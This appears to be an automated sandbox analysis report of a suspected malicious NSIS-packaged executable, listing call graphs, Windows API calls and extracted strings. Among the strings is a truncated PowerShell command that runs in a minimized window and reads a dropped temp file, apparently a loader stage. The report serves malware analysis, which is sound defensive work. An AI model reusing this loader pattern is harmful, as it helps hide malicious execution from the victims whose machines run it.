GetFileAttributesW CreateFileW 3693->3711 3695 4060a4 3695->3687 3696 4060b3 GetFileSize GlobalAlloc 3695->3696 3697 4060d5 3696->3697 3698 40616a CloseHandle 3696->3698 3699 405f25 ReadFile 3697->3699 3698->3687 3700 4060dd 3699->3700 3700->3698 3712 405e07 lstrlenA 3700->3712 3703 4060f4 lstrcpyA 3706 406116 3703->3706 3704 406108 3705 405e07 4 API calls 3704->3705 3705->3706 3707 40614d SetFilePointer 3706->3707 3708 405f54 WriteFile 3707->3708 3709 406163 GlobalFree 3708->3709 3709->3698 3710->3689 3711->3695 3713 405e48 lstrlenA 3712->3713 3714 405e50 3713->3714 3715 405e21 lstrcmpiA 3713->3715 3714->3703 3714->3704 3715->3714 3716 405e3f CharNextA 3715->3716 3716->3713 4463 40190c 4464 401943 4463->4464 4465 402c37 17 API calls 4464->4465 4466 401948 4465->4466 4467 405abe 67 API calls 4466->4467 4468 401951 4467->4468 4469 401d0e 4470 402c15 17 API calls 4469->4470 4471 401d15 4470->4471 4472 402c15 17 API calls 4471->4472 4473 401d21 GetDlgItem 4472->4473 4474 40258c 4473->4474 4475 40190f 4476 402c37 17 API calls 4475->4476 4477 401916 4476->4477 4478 405a12 MessageBoxIndirectW 4477->4478 4479 40191f 4478->4479 4480 404d90 GetDlgItem GetDlgItem 4481 404de2 7 API calls 4480->4481 4490 404ffb 4480->4490 4482 404e85 DeleteObject 4481->4482 4483 404e78 SendMessageW 4481->4483 4484 404e8e 4482->4484 4483->4482 4486 404ec5 4484->4486 4489 4063d2 17 API calls 4484->4489 4485 4050df 4488 40518b 4485->4488 4492 404fee 4485->4492 4498 405138 SendMessageW 4485->4498 4487 404345 18 API calls 4486->4487 4491 404ed9 4487->4491 4493 405195 SendMessageW 4488->4493 4494 40519d 4488->4494 4495 404ea7 SendMessageW SendMessageW 4489->4495 4490->4485 4496 404cde 5 API calls 4490->4496 4512 40506c 4490->4512 4497 404345 18 API calls 4491->4497 4499 4043ac 8 API calls 4492->4499 4493->4494 4501 4051b6 4494->4501 4502 4051af ImageList_Destroy 4494->4502 4509 4051c6 4494->4509 4495->4484 4496->4512 4513 404ee7 4497->4513 4498->4492 4504 40514d SendMessageW 4498->4504 4505 405381 4499->4505 4500 4050d1 SendMessageW 4500->4485 4506 4051bf GlobalFree 4501->4506 4501->4509 4502->4501 4503 405335 4503->4492 4510 405347 ShowWindow GetDlgItem ShowWindow 4503->4510 4508 405160 4504->4508 4506->4509 4507 404fbc GetWindowLongW SetWindowLongW 4511 404fd5 4507->4511 4519 405171 SendMessageW 4508->4519 4509->4503 4524 404d5e 4 API calls 4509->4524 4525 405201 4509->4525 4510->4492 4514 404ff3 4511->4514 4515 404fdb ShowWindow 4511->4515 4512->4485 4512->4500 4513->4507 4518 404f37 SendMessageW 4513->4518 4520 404fb6 4513->4520 4522 404f73 SendMessageW 4513->4522 4523 404f84 SendMessageW 4513->4523 4532 40437a SendMessageW 4514->4532 4531 40437a SendMessageW 4515->4531 4518->4513 4519->4488 4520->4507 4520->4511 4521 405245 4526 40530b InvalidateRect 4521->4526 4530 4052b9 SendMessageW SendMessageW 4521->4530 4522->4513 4523->4513 4524->4525 4525->4521 4527 40522f SendMessageW 4525->4527 4526->4503 4528 405321 4526->4528 4527->4521 4533 404c99 4528->4533 4530->4521 4531->4492 4532->4490 4536 404bd0 4533->4536 4535 404cae 4535->4503 4538 404be9 4536->4538 4537 4063d2 17 API calls 4539 404c4d 4537->4539 4538->4537 4540 4063d2 17 API calls 4539->4540 4541 404c58 4540->4541 4542 4063d2 17 API calls 4541->4542 4543 404c6e lstrlenW wsprintfW SetDlgItemTextW 4542->4543 4543->4535 4544 401491 4545 405414 24 API calls 4544->4545 4546 401498 4545->4546 4547 402592 4548 4025c1 4547->4548 4549 4025a6 4547->4549 4551 4025f5 4548->4551 4552 4025c6 4548->4552 4550 402c15 17 API calls 4549->4550 4559 4025ad 4550->4559 4553 402c37 17 API calls 4551->4553 4554 402c37 17 API calls 4552->4554 4555 4025fc lstrlenW 4553->4555 4556 4025cd WideCharToMultiByte lstrlenA 4554->4556 4555->4559 4556->4559 4557 402629 4558 40263f 4557->4558 4560 405f54 WriteFile 4557->4560 4559->4557 4559->4558 4561 405f83 5 API calls 4559->4561 4560->4558 4561->4557 4562 404493 lstrlenW 4563 4044b2 4562->4563 4564 4044b4 WideCharToMultiByte 4562->4564 4563->4564 4565 404814 4566 404840 4565->4566 4567 404851 4565->4567 4626 4059f6 GetDlgItemTextW 4566->4626 4569 40485d GetDlgItem 4567->4569 4571 4048bc 4567->4571 4575 404871 4569->4575 4570 40484b 4572 406644 5 API calls 4570->4572 4576 4063d2 17 API calls 4571->4576 4586 4049a0 4571->4586 4624 404b4f 4571->4624 4572->4567 4574 404885 SetWindowTextW 4578 404345 18 API calls 4574->4578 4575->4574 4580 405d2c 4 API calls 4575->4580 4582 404930 SHBrowseForFolderW 4576->4582 4577 4049d0 4583 405d89 18 API calls 4577->4583 4584 4048a1 4578->4584 4579 4043ac 8 API calls 4585 404b63 4579->4585 4581 40487b 4580->4581 4581->4574 4590 405c81 3 API calls 4581->4590 4582->4586 4587 404948 CoTaskMemFree 4582->4587 4588 4049d6 4583->4588 4589 404345 18 API calls 4584->4589 4586->4624 4628 4059f6 GetDlgItemTextW 4586->4628 4591 405c81 3 API calls 4587->4591 4629 4063b0 lstrcpynW 4588->4629 4592 4048af 4589->4592 4590->4574 4593 404955 4591->4593 4627 40437a SendMessageW 4592->4627 4596 40498c SetDlgItemTextW 4593->4596 4601 4063d2 17 API calls 4593->4601 4596->4586 4597 4048b5 4599 40678a 5 API calls 4597->4599 4598 4049ed 4600 40678a 5 API calls 4598->4600 4599->4571 4607 4049f4 4600->4607 4602 404974 lstrcmpiW 4601->4602 4602->4596 4605 404985 lstrcatW 4602->4605 4603 404a35 4630 4063b0 lstrcpynW 4603->4630 4605->4596 4606 404a3c 4608 405d2c 4 API calls 4606->4608 4607->4603 4611 405ccd 2 API calls 4607->4611 4613 404a8d 4607->4613 4609 404a42 GetDiskFreeSpaceW 4608->4609 4612 404a66 MulDiv 4609->4612 4609->4613 4611->4607 4612->4613 4614 404afe 4613->4614 4616 404c99 20 API calls 4613->4616 4615 404b21 4614->4615 4617 40140b 2 API calls 4614->4617 4631 404367 KiUserCallbackDispatcher 4615->4631 4618 404aeb 4616->4618 4617->4615 4620 404b00 SetDlgItemTextW 4618->4620 4621 404af0 4618->4621 4620->4614 4623 404bd0 20 API calls 4621->4623 4622 404b3d 4622->4624 4625 40476d SendMessageW 4622->4625 4623->4614 4624->4579 4625->4624 4626->4570 4627->4597 4628->4577 4629->4598 4630->4606 4631->4622 4632 401c19 4633 402c15 17 API calls 4632->4633 4634 401c20 4633->4634 4635 402c15 17 API calls 4634->4635 4636 401c2d 4635->4636 4637 402c37 17 API calls 4636->4637 4639 401c42 4636->4639 4637->4639 4638 401c52 4640 401ca9 4638->4640 4641 401c5d 4638->4641 4639->4638 4642 402c37 17 API calls 4639->4642 4644 402c37 17 API calls 4640->4644 4643 402c15 17 API calls 4641->4643 4642->4638 4645 401c62 4643->4645 4646 401cae 4644->4646 4647 402c15 17 API calls 4645->4647 4648 402c37 17 API calls 4646->4648 4649 401c6e 4647->4649 4650 401cb7 FindWindowExW 4648->4650 4651 401c99 SendMessageW 4649->4651 4652 401c7b SendMessageTimeoutW 4649->4652 4653 401cd9 4650->4653 4651->4653 4652->4653 4654 402a9a SendMessageW 4655 402ab4 InvalidateRect 4654->4655 4656 402abf 4654->4656 4655->4656 4657 40281b 4658 402821 4657->4658 4659 402829 FindClose 4658->4659 4660 402abf 4658->4660 4659->4660 4661 40149e 4662 4022f1 4661->4662 4663 4014ac PostQuitMessage 4661->4663 4663->4662 4671 4029a2 4672 402c15 17 API calls 4671->4672 4673 4029a8 4672->4673 4674 4029e8 4673->4674 4675 4029cf 4673->4675 4680 402885 4673->4680 4677 402a02 4674->4677 4678 4029f2 4674->4678 4676 4029d4 4675->4676 4684 4029e5 4675->4684 4685 4063b0 lstrcpynW 4676->4685 4681 4063d2 17 API calls 4677->4681 4679 402c15 17 API calls 4678->4679 4679->4684 4681->4684 4684->4680 4686 4062f7 wsprintfW 4684->4686 4685->4680 4686->4680 3341 4015a3 3342 402c37 17 API calls 3341->3342 3343 4015aa SetFileAttributesW 3342->3343 3344 4015bc 3343->3344 4687 4028a7 4688 402c37 17 API calls 4687->4688 4689 4028b5 4688->4689 4690 4028cb 4689->4690 4691 402c37 17 API calls 4689->4691 4692 405e7d 2 API calls 4690->4692 4691->4690 4693 4028d1 4692->4693 4715 405ea2 GetFileAttributesW CreateFileW 4693->4715 4695 4028de 4696 402981 4695->4696 4697 4028ea GlobalAlloc 4695->4697 4700 402989 DeleteFileW 4696->4700 4701 40299c 4696->4701 4698 402903 4697->4698 4699 402978 CloseHandle 4697->4699 4716 403441 SetFilePointer 4698->4716 4699->4696 4700->4701 4703 402909 4704 40342b ReadFile 4703->4704 4705 402912 GlobalAlloc 4704->4705 4706 402922 4705->4706 4707 402956 4705->4707 4708 4031ba 44 API calls 4706->4708 4709 405f54 WriteFile 4707->4709 4714 40292f 4708->4714 4710 402962 GlobalFree 4709->4710 4711 4031ba 44 API calls 4710->4711 4712 402975 4711->4712 4712->4699 4713 40294d GlobalFree 4713->4707 4714->4713 4715->4695 4716->4703 4717 40202c 4718 4020f0 4717->4718 4719 40203e 4717->4719 4721 401423 24 API calls 4718->4721 4720 402c37 17 API calls 4719->4720 4722 402045 4720->4722 4728 40224a 4721->4728 4723 402c37 17 API calls 4722->4723 4724 40204e 4723->4724 4725 402064 LoadLibraryExW 4724->4725 4726 402056 GetModuleHandleW 4724->4726 4725->4718 4727 402075 4725->4727 4726->4725 4726->4727 4737 4067f9 WideCharToMultiByte 4727->4737 4731 4020bf 4732 405414 24 API calls 4731->4732 4734 402096 4732->4734 4733 402086 4733->4734 4735 401423 24 API calls 4733->4735 4734->4728 4736 4020e2 FreeLibrary 4734->4736 4735->4734 4736->4728 4738 406823 GetProcAddress 4737->4738 4739 402080 4737->4739 4738->4739 4739->4731 4739->4733 4747 402a2f 4748 402c15 17 API calls 4747->4748 4749 402a35 4748->4749 4750 402a47 4749->4750 4751 402a6c 4749->4751 4752 402885 4749->4752 4750->4752 4755 4062f7 wsprintfW 4750->4755 4751->4752 4753 4063d2 17 API calls 4751->4753 4753->4752 4755->4752 4756 401a30 4757 402c37 17 API calls 4756->4757 4758 401a39 ExpandEnvironmentStringsW 4757->4758 4759 401a4d 4758->4759 4761 401a60 4758->4761 4760 401a52 lstrcmpW 4759->4760 4759->4761 4760->4761 3964 401db3 GetDC 3965 402c15 17 API calls 3964->3965 3966 401dc5 GetDeviceCaps MulDiv ReleaseDC 3965->3966 3967 402c15 17 API calls 3966->3967 3968 401df6 3967->3968 3969 4063d2 17 API calls 3968->3969 3970 401e33 CreateFontIndirectW 3969->3970 3971 40258c 3970->3971 4767 401735 4768 402c37 17 API calls 4767->4768 4769 40173c SearchPathW 4768->4769 4770 401757 4769->4770 4771 402835 4772 40283d 4771->4772 4773 402841 FindNextFileW 4772->4773 4775 402853 4772->4775 4774 40289a 4773->4774 4773->4775 4777 4063b0 lstrcpynW 4774->4777 4777->4775 4778 4014b8 4779 4014be 4778->4779 4780 401389 2 API calls 4779->4780 4781 4014c6 4780->4781 4782 406aba 4788 40693e 4782->4788 4783 4072a9 4784 4069c8 GlobalAlloc 4784->4783 4784->4788 4785 4069bf GlobalFree 4785->4784 4786 406a36 GlobalFree 4787 406a3f GlobalAlloc 4786->4787 4787->4783 4787->4788 4788->4783 4788->4784 4788->4785 4788->4786 4788->4787

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 3 4034de-4034f2 call 40671a lstrlenA 2->3 9 4034f4-403510 call 40678a * 3 3->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 22 40351a 17->22 22->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 31 4035b4-4035b9 28->31 32 4035bb-4035bf 28->32 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 31->31 31->32 34 4035c1-4035c5 32->34 35 4035c6-4035ca 32->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 54 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->54 57 4037fa-40380a ExitProcess CoUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 45 403647-403681 43->45 46 40362c-403631 43->46 50 4035e2-4035e5 44->50 51 4035e7 44->51 45->39 53 403683-403687 45->53 46->45 52 403633-40363b 46->52 50->43 50->51 51->43 61 403642 52->61 62 40363d-403640 52->62 53->39 63 4036a8-4036b6 call 4063b0 53->63 54->37 54->57 55->56 56->28 65 4036a6 56->65 59 403930-403936 57->59 60 403810-403820 call 405a12 ExitProcess 57->60 66 4037ea-4037f1 call 403abe 58->66 67 40375b-403766 call 405cae 58->67 70 4039b4-4039bc 59->70 71 403938-40394e GetCurrentProcess OpenProcessToken 59->71 61->45 62->45 62->61 73 4036bb 63->73 65->73 77 4037f6 66->77 83 4037b4-4037be 67->83 84 403768-40379d 67->84 78 4039c2-4039c6 ExitProcess 70->78 79 4039be 70->79 81 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 71->81 82 403984-403992 call 40678a 71->82 73->29 77->57 79->78 81->82 94 4039a0-4039ab ExitWindowsEx 82->94 95 403994-40399e 82->95 87 4037c0-4037ce call 405d89 83->87 88 403826-40383a call 40597d lstrcatW 83->88 86 40379f-4037a3 84->86 90 4037a5-4037aa 86->90 91 4037ac-4037b0 86->91 87->57 103 4037d0-4037e6 call 4063b0 * 2 87->103 101 403847-403861 lstrcatW lstrcmpiW 88->101 102 40383c-403842 lstrcatW 88->102 90->91 97 4037b2 90->97 91->86 91->97 94->70 96 4039ad-4039af call 40140b 94->96 95->94 95->96 96->70 97->83 101->57 105 403863-403866 101->105 102->101 103->66 107 403868-40386d call 4058e3 105->107 108 40386f call 405960 105->108 113 403874-403882 SetCurrentDirectoryW 107->113 108->113 116 403884-40388a call 4063b0 113->116 117 40388f-4038b8 call 4063b0 113->117 116->117 121 4038bd-4038d9 call 4063d2 DeleteFileW 117->121 124 40391a-403922 121->124 125 4038db-4038eb CopyFileW 121->125 124->121 126 403924-40392b call 406176 124->126 125->124 127 4038ed-40390d call 406176 call 4063d2 call 405995 125->127 126->57 127->124 136 40390f-403916 CloseHandle 127->136 136->124
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE ref: 004034AC
                                                                                              • GetVersion.KERNEL32 ref: 004034B2
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                                              • OleInitialize.OLE32(00000000), ref: 00403529
                                                                                              • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                                              • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                                                • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
                                                                                              • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734
                                                                                                • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004037FA
                                                                                              • CoUninitialize.COMBASE(00000006,?,00000006,00000008,0000000A), ref: 004037FF
                                                                                              • ExitProcess.KERNEL32 ref: 00403820
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
                                                                                              • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin,00000008,?,00000006,00000008,0000000A), ref: 004038CF
                                                                                              • CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
                                                                                              • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403946
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
                                                                                              • ExitProcess.KERNEL32 ref: 004039C6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 354199918-1526256497
                                                                                              • Opcode ID: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
                                                                                              • Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
                                                                                              • Opcode Fuzzy Hash: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
                                                                                              • Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 137 405553-40556e 138 405574-40563b GetDlgItem * 3 call 40437a call 404cb1 GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 4056fd-405704 137->139 157 405659-40565c 138->157 158 40563d-405657 SendMessageW * 2 138->158 140 405706-405728 GetDlgItem CreateThread CloseHandle 139->140 141 40572e-40573b 139->141 140->141 144 405759-405763 141->144 145 40573d-405743 141->145 149 405765-40576b 144->149 150 4057b9-4057bd 144->150 147 405745-405754 ShowWindow * 2 call 40437a 145->147 148 40577e-405787 call 4043ac 145->148 147->144 161 40578c-405790 148->161 154 405793-4057a3 ShowWindow 149->154 155 40576d-405779 call 40431e 149->155 150->148 152 4057bf-4057c5 150->152 152->148 159 4057c7-4057da SendMessageW 152->159 162 4057b3-4057b4 call 40431e 154->162 163 4057a5-4057ae call 405414 154->163 155->148 165 40566c-405683 call 404345 157->165 166 40565e-40566a SendMessageW 157->166 158->157 167 4057e0-40580b CreatePopupMenu call 4063d2 AppendMenuW 159->167 168 4058dc-4058de 159->168 162->150 163->162 176 405685-405699 ShowWindow 165->176 177 4056b9-4056da GetDlgItem SendMessageW 165->177 166->165 174 405820-405835 TrackPopupMenu 167->174 175 40580d-40581d GetWindowRect 167->175 168->161 174->168 178 40583b-405852 174->178 175->174 179 4056a8 176->179 180 40569b-4056a6 ShowWindow 176->180 177->168 181 4056e0-4056f8 SendMessageW * 2 177->181 182 405857-405872 SendMessageW 178->182 183 4056ae-4056b4 call 40437a 179->183 180->183 181->168 182->182 184 405874-405897 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 405899-4058c0 SendMessageW 184->186 186->186 187 4058c2-4058d6 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->168
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055B1
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055C0
                                                                                              • GetClientRect.USER32(?,?), ref: 004055FD
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405604
                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056A0
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056C1
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004055CF
                                                                                                • Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388
                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405713
                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000054E7,00000000), ref: 00405721
                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405728
                                                                                              • ShowWindow.USER32(00000000), ref: 0040574C
                                                                                              • ShowWindow.USER32(?,00000008), ref: 00405751
                                                                                              • ShowWindow.USER32(00000008), ref: 0040579B
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
                                                                                              • CreatePopupMenu.USER32 ref: 004057E0
                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
                                                                                              • GetWindowRect.USER32(?,?), ref: 00405814
                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
                                                                                              • OpenClipboard.USER32(00000000), ref: 00405875
                                                                                              • EmptyClipboard.USER32 ref: 0040587B
                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00405891
                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004058C5
                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
                                                                                              • CloseClipboard.USER32 ref: 004058D6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                              • String ID: (7B${
                                                                                              • API String ID: 590372296-525222780
                                                                                              • Opcode ID: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
                                                                                              • Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
                                                                                              • Opcode Fuzzy Hash: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
                                                                                              • Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68

                                                                                              Control-flow Graph

                                                                                              • Executed
